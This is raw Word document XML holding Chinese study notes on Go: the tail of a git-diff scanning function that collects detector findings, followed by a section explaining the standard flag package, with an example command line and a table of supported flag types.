          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>FilePath:  gitdiffFile.NewName,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>for _, finding := range d.Detect(fragment) {</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>d.addFinding(augmentGitFinding(finding, textFragment, gitdiffFile))</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>return nil</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>})</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>if err := s.Wait(); err != nil {</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:tab/>
        <w:t>return d.findings, err</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>log.Debug().Msgf("%d commits scanned. Note: this number might be smaller than expected due to commits with no additions", len(d.commitMap))</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>return d.findings, nil</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7751E0F3" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1B2FCB62" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="139A20E2" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1AEC2D02" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="71877453" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="748682BE" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="358" w:name="_Toc159779814"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>flag</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：简单快速的绑定命令行传参</w:t>
      </w:r>
      <w:bookmarkEnd w:id="358"/>
    </w:p>
    <w:p w14:paraId="6752B71F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参考链接：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>http://c.biancheng.net/view/5573.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B480317" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="44AB7999" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>flag</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>包比</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>cobra</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>配置更加简单，是个纯命令行的工具</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0164C052" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可以处理命令行指定参数，以及指定参数后其他的传参参数。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1132C62F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="63E9BBFC" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>传参方式通常是一个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> - </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>而不是两个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> - ,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>go run main.go -name "aaa" -age=123 -flagname=999</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18DD9FC2" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0946922C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>注意，flag的解析到参数和parse部分需要写在main中</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73625A67" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>支持的命令行参数类型</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F331901" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">flag </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>包支持的命令行参数类型有</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> bool</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>int</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>int64</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>uint</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>uint64</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>float</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>float64</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>string</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>duration</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72"/>
        <w:gridCol w:w="5347"/>
      </w:tblGrid>
      <w:tr w:rsidR="004C452C" w14:paraId="13361464" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="CCCCCC"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="CCCCCC"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="CCCCCC"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="CCCCCC"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="EDEDED"/>
            <w:tcMar>
              <w:top w:w="84" w:type="dxa"/>
              <w:left w:w="60" w:type="dxa"/>
              <w:bottom w:w="84" w:type="dxa"/>
              <w:right w:w="60" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0653114F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
            <w:pPr>
              <w:widowControl/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="微软雅黑"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="444444"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="微软雅黑" w:hint="eastAsia"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="444444"/>
                <w:kern w:val="0"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>flag 参数</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="CCCCCC"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="CCCCCC"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="CCCCCC"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="CCCCCC"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="EDEDED"/>
            <w:tcMar>
              <w:top w:w="84" w:type="dxa"/>
              <w:left w:w="60" w:type="dxa"/>
              <w:bottom w:w="84" w:type="dxa"/>
              <w:right w:w="60" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3BCBC44A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
            <w:pPr>
              <w:widowControl/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="微软雅黑"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="444444"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="微软雅黑" w:hint="eastAsia"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="444444"/>
                <w:kern w:val="0"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>有效值</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004C452C" w14:paraId="246B2F03" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="CCCCCC"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="CCCCCC"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="CCCCCC"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="CCCCCC"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="60" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="60" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1CB8FB13" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
            <w:pPr>
              <w:widowControl/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="微软雅黑"/>
                <w:color w:val="444444"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="微软雅黑" w:hint="eastAsia"/>
                <w:color w:val="444444"/>
                <w:kern w:val="0"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>字符串 flag</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60" w:type="dxa"/>
              <w:left w:w="60" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="60" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7F84CAF6" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
            <w:pPr>
              <w:widowControl/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="微软雅黑"/>
                <w:color w:val="444444"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="微软雅黑" w:hint="eastAsia"/>
                <w:color w:val="444444"/>
                <w:kern w:val="0"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>合法字符串</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004C452C" w14:paraId="16F1206D" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="CCCCCC"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="CCCCCC"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="CCCCCC"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="CCCCCC"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="60" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="60" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3EF75271" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
            <w:pPr>
              <w:widowControl/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="微软雅黑"/>
                <w:color w:val="444444"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="微软雅黑" w:hint="eastAsia"/>
                <w:color w:val="444444"/>
                <w:kern w:val="0"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>整数 flag</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60" w:type="dxa"/>
              <w:left w:w="60" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="60" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3122966A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
            <w:pPr>
              <w:widowControl/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="微软雅黑"/>
                <w:color w:val="444444"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="微软雅黑" w:hint="eastAsia"/>
                <w:color w:val="444444"/>
                <w:kern w:val="0"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>1234、0664、0x1234 等类型，也可以是负数</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004C452C" w14:paraId="0CAF812F" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="CCCCCC"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="CCCCCC"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="CCCCCC"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="CCCCCC"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="60" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="60" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3B75A6C0" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
            <w:pPr>
              <w:widowControl/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="微软雅黑"/>
                <w:color w:val="444444"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="微软雅黑" w:hint="eastAsia"/>
                <w:color w:val="444444"/>
                <w:kern w:val="0"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>浮点数 flag</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60" w:type="dxa"/>
              <w:left w:w="60" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="60" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2B8AF396" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
            <w:pPr>
              <w:widowControl/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="微软雅黑"/>
                <w:color w:val="444444"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="微软雅黑" w:hint="eastAsia"/>
                <w:color w:val="444444"/>
                <w:kern w:val="0"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>合法浮点数</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004C452C" w14:paraId="4AFB557F" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="CCCCCC"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="CCCCCC"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="CCCCCC"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="CCCCCC"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="60" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="60" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
